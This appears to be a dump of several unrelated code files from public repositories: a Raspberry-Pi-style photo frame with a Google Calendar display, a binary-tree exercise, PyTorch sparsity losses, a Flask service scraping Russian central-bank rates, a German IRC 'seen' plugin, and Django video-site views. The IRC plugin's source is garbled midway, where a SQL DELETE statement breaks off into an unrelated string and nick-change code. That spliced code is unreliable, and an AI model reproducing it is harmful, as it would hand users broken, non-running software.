self.flip()\n return\n\n #print exif info\n exif = getEXIF(imageRaw)\n\n if exif == None:\n print(\"could not get exif for \" + photo_path + \"\\n\")\n else:\n image_date = exif.get('datetime',\"\")\n image_orientation = exif.get('orientation',1)\n \n #rotate first \n if image_orientation == 3:\n imageRot = imageRaw.rotate(180)\n print(\"Rotating \" + photo_path + \"\\n\")\n elif image_orientation == 6:\n imageRot= imageRaw.rotate(270)\n print(\"Rotating \" + photo_path + \"\\n\")\n elif image_orientation == 8:\n imageRot = imageRaw.rotate(90)\n print(\"Rotating \" + photo_path + \"\\n\")\n else:\n imageRot = imageRaw\n\n #now find the image aspect ratio and size\n image_s = imageRot.size \n image_w = image_s[0]\n image_h = image_s[1]\n\n ratio = float(image_w)/float(image_h)\n\n if ratio < screen_ratio: #height is the constraint (portrait)\n h = int(screen_height)\n w = int(h*ratio)\n photoIsPortrait = True\n else: #width is the constraint\n w = int(screen_width)\n h = int(w/ratio)\n photoIsPortrait = False\n\n #then resize\n imageRR = imageRot.resize((w,h),Image.ANTIALIAS)\n\n image1 = ImageTk.PhotoImage(imageRR)\n fp.close()\n \n #hide or show the calendar\n if photoIsPortrait:\n self.parent.parent.show_cal()\n else:\n self.parent.parent.hide_cal()\n\n #show the photo\n self.panel1.config(image=image1)\n self.panel1.image = image1 \n self.after(config.flip_after_secs*1000, self.flip) \n\nclass Clock(Frame):\n def __init__(self, parent, *args, **kwargs):\n Frame.__init__(self, parent, bg='black')\n # initialize time label\n self.time1 = ''\n self.timeLbl = Label(self, font=('Helvetica', large_text_size), fg=\"white\", bg=\"black\")\n self.timeLbl.pack(side=TOP, anchor=E)\n # initialize day of week\n self.day_of_week1 = ''\n self.dayOWLbl = Label(self, text=self.day_of_week1, font=('Helvetica', medium_text_size), fg=\"white\", bg=\"black\")\n self.dayOWLbl.pack(side=TOP, anchor=E)\n # initialize date label\n self.date1 = ''\n self.dateLbl = Label(self, text=self.date1, font=('Helvetica', medium_text_size), fg=\"white\", bg=\"black\")\n self.dateLbl.pack(side=TOP, anchor=E)\n self.tick()\n\n def tick(self):\n with setlocale(ui_locale):\n if time_format == 12:\n time2 = time.strftime('%I:%M %p') #hour in 12h format\n else:\n time2 = time.strftime('%H:%M') #hour in 24h format\n\n day_of_week2 = time.strftime('%A')\n date2 = time.strftime(date_format)\n # if time string has changed, update it\n if time2 != self.time1:\n self.time1 = time2\n self.timeLbl.config(text=time2)\n if day_of_week2 != self.day_of_week1:\n self.day_of_week1 = day_of_week2\n self.dayOWLbl.config(text=day_of_week2)\n if date2 != self.date1:\n self.date1 = date2\n self.dateLbl.config(text=date2)\n # calls itself every 200 milliseconds\n # to update the time display as needed\n # could use >200 ms, but display gets jerky\n self.timeLbl.after(200, self.tick)\n \nclass Calendar(Frame):\n def __init__(self, parent, *args, **kwargs):\n Frame.__init__(self, parent, bg='black')\n if config.google_calendar_id != False:\n self.title = 'Upcoming' \n else:\n self.title = \"\"\n self.calendarLbl = Label(self, text=self.title, font=('Helvetica', large_text_size), fg=\"white\", bg=\"black\")\n self.calendarLbl.pack(side=TOP, anchor=W)\n self.eventsContainer = Frame(self, bg=\"black\")\n self.eventsContainer.pack(side=TOP)\n if config.google_calendar_id != False:\n self.get_events()\n\n def get_events(self):\n print(\"getting events\")\n try:\n # remove all children\n for widget in self.eventsContainer.winfo_children():\n 
widget.destroy()\n\n            now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n            print('Getting the upcoming 10 events')\n            events_result = service.events().list(calendarId=config.google_calendar_id, timeMin=now,\n                                                maxResults=10, singleEvents=True,\n                                                orderBy='startTime').execute()\n            events = events_result.get('items', [])\n\n            if not events:\n                eventFrame = calendarevent(self.eventsContainer, \"No upcoming events found\")\n                eventFrame.pack(side=TOP, anchor=W)\n                print('No upcoming events found.')\n            for event in events:\n                start = event['start'].get('dateTime', event['start'].get('date'))\n                lDate = start.split('T')\n                sDT = datetime.datetime.strptime(lDate[0],\"%Y-%m-%d\")\n                eventFrame = calendarevent(self.eventsContainer, event['summary'],custom_strftime('%A %B {S}',sDT))\n                eventFrame.pack(side=TOP, anchor=W) \n                print(event['summary'],custom_strftime('%A %B {S}',sDT))\n            \n        except Exception as e:\n            import traceback  # not imported at module top; local import avoids a NameError here\n            traceback.print_exc()\n            print(\"Error: %s. Cannot get calendar.\" % e)\n\n        self.after(millis_between_calendar_checks, self.get_events)\n\n\nclass calendarevent(Frame):\n    def __init__(self, parent, event_name=\"\",event_date=\"\"):\n        Frame.__init__(self, parent, bg='black')\n\n        self.eventName = event_name\n        self.eventNameLbl = Label(self, text=self.eventName, font=('Helvetica', medium_text_size), fg=\"white\", bg=\"black\")\n        self.eventNameLbl.pack(side=TOP, anchor=W)\n        self.eventDate = event_date\n        self.eventDateLbl = Label(self, text=self.eventDate, font=('Helvetica', small_text_size), fg=\"white\", bg=\"black\")\n        self.eventDateLbl.pack(side=TOP, anchor=W)\n\nclass Blank(Frame):\n    def __init__(self, parent, *args, **kwargs):\n        Frame.__init__(self, parent, bg='black')\n        self.title = 'BLANK' \n        self.calendarLbl = Label(self, text=self.title, font=('Helvetica', large_text_size), fg=\"white\", bg=\"black\")\n        self.calendarLbl.pack(side=TOP, anchor=W)\n\nclass FullscreenWindow:\n\n    def __init__(self):\n        self.tk = Tk()\n        self.tk.configure(background='black',cursor=\"none\")\n        self.topFrame = Frame(self.tk, background = 'black')\n        self.topFrame.parent = self\n        #self.bottomFrame = Frame(self.tk, background = 'black')\n        self.topFrame.pack(side = TOP, fill=BOTH, expand = YES)\n        #self.bottomFrame.pack(side = BOTTOM, fill=BOTH, expand = YES)\n        self.state = False\n        self.tk.bind(\"\", self.toggle_fullscreen)\n        self.tk.bind(\"\", self.end_fullscreen)\n        self.tk.bind('',self.hide_cal)\n        self.tk.bind('',self.show_cal)\n        # clock\n        self.clock = Clock(self.topFrame)\n        self.clock.pack(side=RIGHT, anchor=N, padx=10, pady=0)\n        # Calendar\n        self.calendar = Calendar(self.topFrame)\n        self.calendar.pack(side = RIGHT, anchor=S, padx=20, pady=0)\n        # Photo\n        self.photo = Photo(self.topFrame)\n        self.photo.pack(side=LEFT, anchor=N, padx=0, pady=0)\n        #~ # weather\n        #~ self.weather = Weather(self.topFrame)\n        #~ self.weather.pack(side=LEFT, anchor=N, padx=100, pady=60)\n        #~ # news\n        #~ self.news = News(self.bottomFrame)\n        #~ self.news.pack(side=LEFT, anchor=S, padx=100, pady=60)\n\n        #~ self.calendar.pack_forget()\n        #blank widget for hiding calendar when there isn't enough room\n        #~ self.blank = Blank(self.topFrame)\n        #~ self.blank.pack(side=RIGHT, anchor=S, padx=0, pady=0)\n        self.toggle_fullscreen()\n\n    def toggle_fullscreen(self, event=None):\n        self.state = not self.state # Just toggling the boolean\n        self.tk.attributes(\"-fullscreen\", self.state)\n        return \"break\"\n\n    def end_fullscreen(self, 
event=None):\n self.state = False\n self.tk.attributes(\"-fullscreen\", False)\n return \"break\"\n \n def hide_cal(self, event=None):\n self.calendar.pack_forget()\n print(\"hiding\")\n\n def show_cal(self, event=None):\n self.calendar.pack(side = RIGHT, anchor=S, padx=0, pady=0)\n print(\"showing\")\n\nif __name__ == '__main__':\n #do calendar set-up\n print(\"setting up Google Calendar connection\")\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'calendar-python-quickstart.json')\n\n store = file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(credential_path, SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('calendar', 'v3', http=creds.authorize(Http()))\n\n #set up connection\n userID = config.userID\n password = config.password\n\n client_machine_name = config.client_machine_name\n server_name = config.server_name\n server_ip = config.server_ip\n domain_name = config.domain_name\n\n share_name = config.share_name\n photo_dir = '/' + config.photo_directory\n\n conn = SMBConnection(userID, password, client_machine_name, server_name, domain=domain_name, use_ntlm_v2=True,\n is_direct_tcp=True)\n\n conn.connect(server_ip, 445)\n\n #build a list of folders\n print(\"building directory list\")\n dirs = GetDirs(conn, share_name, photo_dir)\n\n #setup windows and begin event loop\n w = FullscreenWindow()\n w.tk.mainloop()\n\n\n\n","repo_name":"tklenke/YAPSFrame","sub_path":"YAPSFrame.py","file_name":"YAPSFrame.py","file_ext":"py","file_size_in_byte":15364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25476348862","text":"class Node:\n def __init__(self, dato):\n self.dato = dato\n self.left = None\n self.right = None\n\n\n# Cuantos Nodos hay?\n\ndef contarNodos(root, cantidad=0):\n if root is None:\n return cantidad\n else:\n nodoIzquierda = contarNodos(root.left)\n nodosDerecha = contarNodos(root.right)\n yo = 1\n return nodoIzquierda + nodosDerecha + yo\n\n\n# Altura del arbol:\n\ndef alturaMax(root):\n if root is None:\n return 0\n else:\n alturaIzq = alturaMax(root.left)\n alturaDer = alturaMax(root.right)\n return max(alturaIzq, alturaDer) + 1\n\n\nroot = Node(1)\nnodo2 = Node(2)\nnodo3 = Node(3)\nnodo4 = Node(4)\nnodo5 = Node(5)\nnodo6 = Node(6)\nnodo7 = Node(7)\n\nroot.left = nodo2\nroot.right = nodo3\nnodo3.left = nodo4\nnodo3.right = nodo5\nnodo2.left = nodo6\nnodo2.right = nodo7\n\nprint(\"La cantidad de nodos es: \")\nprint(contarNodos(root))\nprint(\"La altura del arbol es:\")\nprint(alturaMax(root))\n","repo_name":"PabloBaezS/Estructuras_datos_algoritmos","sub_path":"Seguimiento 2/AlturaNodos.py","file_name":"AlturaNodos.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11367694567","text":"#str='hello boo' #this gives an error thus use try block becoz there was no num in str\r\n#istr=int(str)\r\n#print(istr)\r\n\r\nstr='hello boo' #when the first conversion fails it will jump into except block\r\ntry:\r\n istr=int(str)\r\nexcept:\r\n istr=-1\r\nprint('first',istr)\r\nstr='123' #here it is crct so it will execute try block\r\ntry:\r\n istr=int(str)\r\nexcept:\r\n istr=-1\r\nprint('second',istr)\r\n\r\n#output\r\n#first -1\r\n#second 
123\r\n","repo_name":"Sneha255-prog/PYTHON-PROG","sub_path":"tryexcept.py","file_name":"tryexcept.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15456072300","text":"from typing import Dict, Union, Tuple\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .utils import hoyer\n\n\n__all__ = [\"hoyer_loss\", \"l1_loss\", \"l2_loss\"]\n\n\ndef hoyer_loss(features: Dict[str, torch.Tensor] = {}, dim: Union[int, Tuple[int]] = None, epsilon: float = 0.000000000001) -> torch.float:\n \"\"\"\n Hoyer square loss: https://arxiv.org/pdf/1908.09979.pdf\n\n Takes a dictionary of tensors\n\n returns (|feature|_1)^2/((|feature|_2)^2 + epsilon)\n \"\"\"\n loss = 0\n for feature in features:\n loss += torch.mean(hoyer(x=features[feature], dim=dim, epsilon=epsilon)**2)\n return loss\n\n\ndef l1_loss(features: Dict[str, torch.Tensor] = {}, dim: Union[int, Tuple[int]] = None) -> torch.float:\n \"\"\"\n L1 loss: L1 norm of the given tensors disctionary\n\n Takes a dictionary of tensors\n\n returns |feature|_1\n \"\"\"\n loss = 0\n for feature in features:\n loss += torch.mean(torch.sum(torch.abs(features[feature]), dim=dim))\n return loss\n\n\ndef l2_loss(features: Dict[str, torch.Tensor] = {}, dim: Union[int, Tuple[int]] = None) -> torch.float:\n \"\"\"\n L2 loss: L2 norm of the given tensors disctionary\n\n Takes a dictionary of tensors\n\n returns |feature|_2\n \"\"\"\n loss = 0\n for feature in features:\n loss += torch.mean(torch.sqrt(torch.sum(features[feature]**2, dim=dim)))\n return loss\n\n\ndef saliency_K(features: Dict[str, torch.Tensor], K: int, saliency_lambda: float = 1.0, dim: Union[int, Tuple[int]] = None, **kwargs):\n\n # sort in channel dimension; each patch's outputs should be sparse\n loss = 0\n for feature in features:\n sorted = torch.sort(features[feature].abs(), dim=1, descending=True)[0]\n top_K_avg = sorted[:, :K].mean(dim=1)\n bottom_avg = sorted[:, K:].mean(dim=1)\n loss += top_K_avg-saliency_lambda*bottom_avg\n return loss\n","repo_name":"metehancekic/hebbian","sub_path":"src/lib/pytorch_utils/loss/regularizers.py","file_name":"regularizers.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2042298464","text":"#!/usr/bin/env python3\nfrom typing import Dict\n\nimport requests\n\nfrom flask import (\n Flask,\n request, abort, jsonify\n)\nfrom bs4 import BeautifulSoup as bs\n\nCBR_BASE_URL = \"https://www.cbr.ru/eng\"\nCBR_DAILY_URL = f\"{CBR_BASE_URL}/currency_base/daily/\"\nCBR_KEY_INDICATORS_URL = f\"{CBR_BASE_URL}/key-indicators/\"\n\napp = Flask(__name__)\n\n\nclass Asset:\n def __init__(self, name: str, capital: float, interest: float, char_code: str):\n self.name = name\n self.capital = capital\n self.interest = interest\n self.char_code = char_code\n\n def calculate_revenue(self, years: int, rate: float) -> float:\n \"\"\"Сам расчёт\"\"\"\n revenue = rate * self.capital * ((1.0 + self.interest) ** years - 1.0)\n return revenue\n\n\ndef parse_cbr_currency_base_daily(html_data: str) -> Dict[str, float]:\n \"\"\"Парсим html-ку с ежедневными значениями\"\"\"\n curr_rate = {}\n beautiful_soup = bs(html_data, 'html.parser')\n html = beautiful_soup.find('html')\n body = html.find('body')\n main = body.find('main', id='content')\n\n div_1 = main.find('div', class_='offsetMenu')\n div_2 = div_1.find('div', 
class_='container-fluid')\n div_3 = div_2.find('div', class_='col-md-23 offset-md-1')\n div_4 = div_3.find('div', class_='table-wrapper')\n div_5 = div_4.find('div', class_='table')\n table = div_5.find('table', class_='data')\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n for i in range(1, len(rows)):\n row = rows[i]\n tds = row.find_all('td')\n char_code = tds[1].string\n unit = float(tds[2].string.replace(\",\", \"\"))\n rate = float(tds[4].string.replace(\",\", \"\"))\n curr_rate[char_code] = rate / unit\n return curr_rate\n\n\ndef parse_cbr_key_indicators(html_data: str) -> Dict[str, float]:\n \"\"\"Парсим html-ку с ключевыми индикаторами\"\"\"\n curr_rate = {}\n beautiful_soup = bs(html_data, 'html.parser')\n html = beautiful_soup.find('html')\n body = html.find('body')\n main = body.find('main', id='content')\n\n div_1 = main.find('div', class_='offsetMenu')\n div_2 = div_1.find('div', class_='container-fluid')\n div_3 = div_2.find('div', class_='col-md-23 offset-md-1')\n div_4 = div_3.find('div', class_='dropdown')\n div_5 = div_4.find('div', class_='dropdown_content')\n div_6 = div_5.find_all('div', class_='key-indicator_content offset-md-2')\n for k in range(3):\n div_7 = div_6[k].find('div', class_='key-indicator_table_wrapper')\n div_8 = div_7.find('div', class_='table key-indicator_table')\n table = div_8.find('table')\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n for i in range(1, len(rows)):\n row = rows[i]\n tds = row.find_all('td')\n div_1 = tds[0].find('div')\n if div_1:\n div_2 = div_1.find_all('div')\n char_code = div_2[1].string\n if tds[-1].string:\n try:\n value_2 = float(tds[-1].string.replace(\",\", \"\"))\n curr_rate[char_code] = value_2\n except ValueError:\n pass\n return curr_rate\n\n\nclass AssetList:\n def __init__(self, name):\n self.name = name\n self.asset_dict = {}\n\n def cleanup(self):\n \"\"\"cleanup\"\"\"\n self.asset_dict = {}\n\n def calculate_all_revenue(self, period: int) -> float:\n \"\"\"calculate_revenue\"\"\"\n cbr_daily_response = requests.get(CBR_DAILY_URL)\n cbr_key_indicators_response = requests.get(CBR_KEY_INDICATORS_URL)\n if not (cbr_daily_response.ok or cbr_key_indicators_response.ok):\n raise ValueError()\n currency_dict = parse_cbr_currency_base_daily(cbr_daily_response.text)\n metal_dict = parse_cbr_key_indicators(cbr_key_indicators_response.text)\n total_revenue = 0\n for asset in self.asset_dict.values():\n if asset.char_code in metal_dict:\n rate = metal_dict[asset.char_code]\n else:\n rate = currency_dict.get(asset.char_code, 0)\n revenue = asset.calculate_revenue(period, rate)\n total_revenue += revenue\n return total_revenue\n\n def get_asset_list(self, name_list=None):\n m_asset_list = []\n for asset in self.asset_dict.values():\n if name_list is None or asset.name in name_list:\n asset_repr = [asset.char_code, asset.name, asset.capital, asset.interest]\n m_asset_list.append(asset_repr)\n m_asset_list = sorted(m_asset_list, key=lambda x: x[1])\n m_asset_list = sorted(m_asset_list, key=lambda x: x[0])\n return m_asset_list\n\n\n@app.errorhandler(404)\ndef not_found(_ignored):\n \"\"\"Обращение по несуществующему route\"\"\"\n return \"This route is not found\", 404\n\n\n@app.errorhandler(503)\ndef not_exist(_ignored):\n \"\"\"Недоступность cbr.ru\"\"\"\n return 'CBR service is unavailable', 503\n\n\n@app.route(\"/api/asset/cleanup\")\ndef cleanup_asset_list():\n \"\"\"Очистить список активов.\"\"\"\n asset_list.cleanup()\n return 'there are no more assets', 
200\n\n\n@app.route(\"/api/asset/calculate_revenue\")\ndef calculate_revenue():\n \"\"\"Оценочная инвестиционная доходность\"\"\"\n try:\n user_period = request.args.getlist(\"period\")\n revenues = {}\n for period in user_period:\n revenue = asset_list.calculate_all_revenue(int(period))\n revenues[str(int(period))] = revenue\n return jsonify(revenues)\n except Exception:\n abort(503)\n\n\n@app.route(\"/api/asset/get\")\ndef get_asset_list_by_name():\n \"\"\"Список всех перечисленных активов\"\"\"\n user_name_list = request.args.getlist(\"name\")\n m_asset_list = asset_list.get_asset_list(user_name_list)\n return jsonify(m_asset_list)\n\n\n@app.route(\"/api/asset/list\")\ndef get_asset_list():\n \"\"\"Список всех доступных активов\"\"\"\n m_asset_list = asset_list.get_asset_list()\n return jsonify(m_asset_list)\n\n\n@app.route(\"/api/asset/add////\")\n@app.route(\"/api/asset/add////\")\n@app.route(\"/api/asset/add////\")\n@app.route(\"/api/asset/add////\")\ndef add_asset(char_code, name, capital, interest):\n \"\"\"Возможность работать с портфелем активов в формате Web-сервиса\"\"\"\n if name not in asset_list.asset_dict:\n new_asset = Asset(name, float(capital), float(interest), char_code)\n asset_list.asset_dict[name] = new_asset\n return f\"Asset '{name}' was successfully added\", 200\n return f\"Asset '{name}' is already exist\", 403\n\n\n@app.route(\"/cbr/daily\")\ndef get_cbr_daily():\n \"\"\"Запрос на страницу “daily” (взять курсы валют), ответ: {“char_code”: rate}\"\"\"\n try:\n cbr_daily_response = requests.get(CBR_DAILY_URL)\n if not cbr_daily_response.ok:\n abort(503)\n curr_dict = parse_cbr_currency_base_daily(cbr_daily_response.text)\n return curr_dict\n except Exception:\n abort(503)\n\n\n@app.route(\"/cbr/key_indicators\")\ndef get_cbr_key_indicators():\n \"\"\"Запрос на страницу “key-indicators” (взять USD, EUR и драг металлы), ответ {“char_code”: rate}\"\"\"\n try:\n cbr_key_indicators_response = requests.get(CBR_KEY_INDICATORS_URL)\n if not cbr_key_indicators_response.ok:\n abort(503)\n metal_dict = parse_cbr_key_indicators(cbr_key_indicators_response.text)\n return metal_dict\n except Exception:\n abort(503)\n\n\nasset_list = AssetList(\"global_list\")\n","repo_name":"makaryb/2021-python","sub_path":"task8/task_Boriskin_Makary_asset_web_service.py","file_name":"task_Boriskin_Makary_asset_web_service.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"46999208672","text":"import re, sqlite3, time, random\nfrom modules.monitor import User\nfrom bot import is_on_channel, same_nick\n\n\nDEBUG=False # True = alle Plugin-Exceptions fatal\n\nlast_action_time = 0\nACTION_TIMEOUT = 1.5\n\ndef approve_action():\n\tglobal last_action_time\n\tif last_action_time + ACTION_TIMEOUT > time.time():\n\t\treturn False\n\telse:\n\t\tlast_action_time = time.time()\n\t\treturn True\n\n\nconnection = None\ndef get_connection():\n\tglobal connection\n\tif not connection:\n\t\tconnection = sqlite3.connect(\"seen.db\")\n\treturn connection\n\n\n# FIXME: Das sollte nur der Bot-Owner können, wir haben aber noch kein \n# richtiges AAA-Konzept\ndef seen_initmsgdb( plugin, connection, channel, source_nick, args ):\n\tcon = get_connection()\n\tc = con.cursor()\n\ttry:\n\t\tc.execute( \"\"\"drop table messages\"\"\" )\n\texcept sqlite3.OperationalError as e:\n\t\tprint( e )\n\tc.execute( \"\"\"create table messages (id integer primary key, \n\t\ttime integer, author text, recipient text, msg txt, 
received integer)\"\"\" )\r\n\tcon.commit()\r\n\tc.close()\r\n\r\n\r\ndef seen_setmsg( plugin, connection, channel, source_nick, msg ):\r\n\tcon = get_connection()\r\n\tc = con.cursor()\r\n\tc.execute( \"\"\"insert into messages (time,author,recipient,msg,received)\r\n\t\t values(?,?,?,?,?)\"\"\", \r\n\t\t (time.time(), source_nick.strip().lower(), \"\", msg, 0) )\r\n\tcon.commit()\r\n\tc.close()\r\n\r\n\r\ndef seen_getmsg( plugin, connection, channel, source_nick, nick ):\r\n\tcon = get_connection()\r\n\tc = con.cursor()\r\n\tc.execute( \"\"\"select id, time, author, recipient, msg, received \r\n\t\tfrom messages where id=(select max(id) from messages \r\n\t\twhere author=? and recipient='')\"\"\",\r\n\t\t(nick.strip().lower(),) )\r\n\tfor row in c:\r\n\t\t_id, _time, _author, _recipient, _msg, _received = row\r\n\t\t_time = time.strftime( '%d.%m.%Y %H:%M:%S',time.localtime( _time ) )\r\n\t\tconnection.action( channel, \"hat am %(_time)s von %(_author)s folgende, öffentliche Nachricht notiert: %(_msg)s\" \\\r\n\t\t\t% locals() )\r\n\t\tc.execute( \"\"\"update messages set received=received+1 where id=?\"\"\", \r\n\t\t\t(_id,) )\r\n\tcon.commit()\r\n\tc.close()\r\n\r\n\r\n# FIXME: Only the bot owner should be able to do this, but we don't have \r\n# a proper AAA concept yet\r\ndef seen_initseendb( plugin, connection, channel, source_nick, args ):\r\n\tcon = get_connection()\r\n\tc = con.cursor()\r\n\ttry:\r\n\t\tc.execute( \"\"\"drop table seen\"\"\" )\r\n\texcept sqlite3.OperationalError as e:\r\n\t\tprint( e )\r\n\tc.execute( \"\"\"create table seen (id integer primary key, \n\t\ttime integer, nick text, channel text, server txt, eventtype text, msg text)\"\"\" )\r\n\tcon.commit()\r\n\tc.close()\r\n\r\n\r\ndef seen_seen( plugin, connection, channel, source_nick, nick ):\r\n\tif not nick:\r\n\t\tconnection.action( channel, \"==> !seen <nick> | !setmsg <msg> | !getmsg <nick> \" )\r\n\telif same_nick( source_nick, nick ):\r\n\t\tconnection.action( channel, \"glaubt, dass %(source_nick)s an Identitätsstörungen leidet und macht sich unauffällig eine Notiz.\" % locals() )\r\n\telif is_on_channel( plugin, connection, channel, nick ):\r\n\t\tconnection.action( channel, \"reicht %(source_nick)s eine Brille und zeigt auf die Besucherliste. %(nick)s ist doch da!\" % locals() )\r\n\telif random.randint(1,10)==1:\r\n\t\tconnection.action( channel, \"findet, dass es in Mecklenburg-Vorpommern schöne Seen gibt, weiß aber nicht was %(nick)s davon hält.\" % locals() )\r\n\telse:\r\n\t\tcon = get_connection()\r\n\t\tc = con.cursor()\r\n\t\t# Due to the subselect construction with max(id), this statement\r\n\t\t# only returns the newest entry that matches a search expression:\r\n\t\tc.execute( \"\"\"select id, time, nick, eventtype, msg\r\n\t\t\tfrom seen where id=(\r\n\t\t\t\tselect max(id) from seen \r\n\t\t\t\twhere nick like ? and channel=? 
and server=?)\"\"\",\n\t\t\t(nick.strip().lower().replace('*','%'),channel,connection.server) )\n\t\trows = c.fetchall()\n\t\tif rows:\n\t\t\t_id, _time, _nick, _eventtype, _msg = rows[0]\n\t\t\t_time = time.strftime( '%d.%m.%Y %H:%M:%S',time.localtime( _time ) )\n\t\t\ttxt = \"hat %(_nick)s zuletzt am %(_time)s gesehen, als sie oder er\"\n\t\t\tif _eventtype==\"join\":\n\t\t\t\ttxt += \" den Raum betrat\"\n\t\t\telif _eventtype==\"part\":\n\t\t\t\ttxt += \" den Raum verließ\"\n\t\t\telif _eventtype==\"nick\":\n\t\t\t\ttxt += \" den Namen änderte\"\n\t\t\telif _eventtype==\"namreply\":\n\t\t\t\ttxt += \" hier herumstromerte\"\n\t\t\telif _eventtype==\"quit\":\n\t\t\t\ttxt += \" die Verbindung verlor\"\n\t\t\tif _msg:\n\t\t\t\ttxt += \" (%(_msg)s)\"\n\t\t\ttxt += \".\"\n\t\t\tconnection.action( channel, txt % locals() )\n\t\telse:\n\t\t\ttxt = \"ich kann mich nicht erinnern, dass %s jemals hier gewesen wäre.\"\n\t\t\tconnection.privmsg( channel, txt % nick )\n\t\tc.execute(\"\"\"DELETE FROM \"seen\" WHERE \"time\" %s in #sozphobie\" % (ref_old.nick, ref_new.nick) )\n\t\t\t\t\tc.execute( \"\"\"insert into seen (time,nick,channel,server,eventtype,msg)\n\t\t\t\t\t\t values(?,?,?,?,?,?)\"\"\", \n\t\t\t\t\t\t (time.time(), ref_old.nick, channel.name, \n\t\t\t\t\t\t \tconnection.server, event.eventtype(), \"danach: \"+ref_new.nick) )\n\t\t\t\t\tc.execute( \"\"\"insert into seen (time,nick,channel,server,eventtype,msg)\n\t\t\t\t\t\t values(?,?,?,?,?,?)\"\"\", \n\t\t\t\t\t\t (time.time(), ref_new.nick, channel.name, \n\t\t\t\t\t\t \tconnection.server, event.eventtype(), \"zuvor: \"+ref_old.nick) )\n\t\t\tcon.commit()\n\t\t\tc.close()\n\t\t\t\t\n\n\nHANDLERS = {\n\t\"privmsg\" : handle_msg,\n\t\"pubmsg\" : handle_msg,\n\t\"namreply\" : handle_namreply,\n\t\"join\" : handle_joinpart,\n\t\"part\" : handle_joinpart,\n\t\"quit\" : handle_joinpart,\n\t\"nick\" : handle_nick_change,\n}\n\n","repo_name":"syslock/sozphobine","sub_path":"modules/seen.py","file_name":"seen.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71589669693","text":"with open(\"./2015/day1/data.txt\", \"r\") as f:\n x = 0\n c = 1\n\n for i in f.read():\n if i == \"(\": x += 1\n else: x -= 1\n\n if x == -1:\n print(c)\n break\n\n c += 1\n\n# answer: 1795","repo_name":"shashwatb14/AdventOfCode","sub_path":"2015/day1/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19709817588","text":"from django.shortcuts import render,redirect\nfrom .models import Videos,Comments,CommentLike,Category,profile,Reply\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\nfrom django.contrib.auth.views import login_required\nfrom rest_framework import viewsets\nfrom .serializers import Videos,VideosSerializers\nfrom rest_framework.authentication import TokenAuthentication,SessionAuthentication\nfrom rest_framework.permissions import IsAdminUser,IsAuthenticated\n# Create your views here.\n\n\nclass VideosViewSet(viewsets.ModelViewSet):\n serializer_class = VideosSerializers\n queryset = Videos.objects.all()\n #authentication_classes = [SessionAuthentication,TokenAuthentication]\n #permission_classes = [IsAdminUser]\n\n\n\n\ndef home(request):\n videos = Videos.objects.all()\n if request.GET.get('search') is not None:\n videos = Videos.objects.filter(title=request.GET.get('search'))\n if 
len(videos) == 0:\n        category = Category.objects.filter(title=request.GET.get('search'))\n        videos = []\n        for i in category:\n            videos.append(Videos.objects.get(id=i.video.id))\n\n        if len(videos)==0:\n            try:\n                videos = Videos.objects.filter(user=User.objects.get(username=request.GET.get('search')))\n            except:\n                videos = []\n\n    return render(request,'blogapp/home.html',{'videos':videos})\n\ndef watch(request,id):\n    video = Videos.objects.get(id=id)\n    if request.user.is_authenticated:\n        if request.method == 'POST':\n            comment = Comments()\n            comment.video = video\n            comment.comment = request.POST['comment']\n            comment.user = request.user\n            comment.save()\n\n    return render(request, 'blogapp/watch.html', {'video': video})\n\n\ndef comments(request,title):\n    title = title.split('/')[-1]\n    video = Videos.objects.get(id=int(title))\n    comments = Comments.objects.filter(video=video.id)\n    likes = []\n    replys = []\n    try:\n        for comment in comments:\n\n            if Reply.objects.filter(comment=comment):\n                replys.append(Reply.objects.filter(comment=comment))\n    except:\n        pass\n    if comments == None:\n        return render(request,'blogapp/comments.html')\n\n    #return render(request, 'blogapp/comments.html', {'video': video,'comments':comments})\n\n    return render(request, 'blogapp/comments.html', {'video': video, 'comments': comments,'replys':replys,'likes':likes})\n\n\n\n@login_required\ndef like(request,id):\n    video = Videos.objects.get(id=id)\n    comment = Comments.objects.get(video=video)\n    comment_likes = CommentLike.objects.get(comment=comment)\n    return redirect(request.META.get('HTTP_REFERER'))\n\n@login_required\ndef add_video(request):\n    if request.method == 'POST':\n        video = Videos()\n        video.title,video.discreption,video.thumbnail,video.video = request.POST['title'],request.POST[\"discreption\"],request.FILES['thumbnail'],request.FILES['video']\n        video.user = request.user\n        video.save()\n        return redirect('home')\n    return render(request,'blogapp/add_video.html')\n\n@login_required\ndef update_profile(request,id):\n    if request.method == 'POST':\n\n        try:\n            pro = profile.objects.get(id=User.objects.get(id=id).profile.id)\n            pro.delete()\n            user = User()\n            user.id = request.user.id\n            user.first_name,user.last_name,user.profile.profile_discreption,user.profile.image = request.POST['first_name'],request.POST['last_name'],request.POST['profile_discreption'],request.FILES['image']\n            user.profile.user=request.user\n            user.save()\n        except:\n            pro = profile()\n            pro.user = request.user\n            pro.profile_discreption = request.POST['profile_discreption']\n            pro.image = request.FILES['image']\n            pro.save()\n\n        user = User.objects.get(id=id)\n\n        user.first_name, 